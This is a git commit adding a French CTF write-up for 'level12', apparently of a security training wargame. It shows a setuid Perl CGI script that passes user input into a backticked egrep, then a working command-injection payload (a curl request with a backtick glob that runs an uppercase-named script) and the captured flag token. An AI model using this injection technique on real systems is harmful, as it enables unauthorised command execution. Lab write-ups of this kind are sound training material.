docs(lvl12): adding the readme
This commit is contained in:
Raphael
parent
3e60a1558d
commit
1bf9c83d06
1 changed files with 51 additions and 0 deletions
51
level12/README.md
Normal file
51
level12/README.md
Normal file
|
|
@ -0,0 +1,51 @@
|
|||
Lors de mon arriver sur le level12 je remarque un fichier lisible avec un script perl
|
||||
|
||||
```bash
|
||||
ls -l
|
||||
total 4
|
||||
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl
|
||||
```
|
||||
|
||||
Ce sciprt prends 2 entree utilisateur (x, y) et transforme x a l'aide de la commande egrep
|
||||
```perl
|
||||
#!/usr/bin/env perl
|
||||
# localhost:4646
|
||||
use CGI qw{param};
|
||||
print "Content-type: text/html\n\n";
|
||||
|
||||
sub t {
|
||||
$nn = $_[1];
|
||||
$xx = $_[0];
|
||||
$xx =~ tr/a-z/A-Z/;
|
||||
$xx =~ s/\s.*//;
|
||||
@output = `egrep "^$xx" /tmp/xd 2>&1`;
|
||||
foreach $line (@output) {
|
||||
($f, $s) = split(/:/, $line);
|
||||
if($s =~ $nn) {
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
sub n {
|
||||
if($_[0] == 1) {
|
||||
print("..");
|
||||
} else {
|
||||
print(".");
|
||||
}
|
||||
}
|
||||
|
||||
n(t(param("x"), param("y")));
|
||||
|
||||
```
|
||||
|
||||
L'exploit est donc assez simple il suffit de mettre la commande souhaiter dans un fichier avec un nom en majuscule (a cause du tr) et elle sera executer
|
||||
|
||||
```bash
|
||||
echo "getflag > /tmp/pass" > /tmp/LEVEL
|
||||
mv /tmp/level /tmp/LEVEL
|
||||
curl 'localhost:4646?x=`/*/LEVEL`'
|
||||
cat /tmp/pass
|
||||
Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
|
||||
```
|
||||
Loading…
Add table
Add a link
Reference in a new issue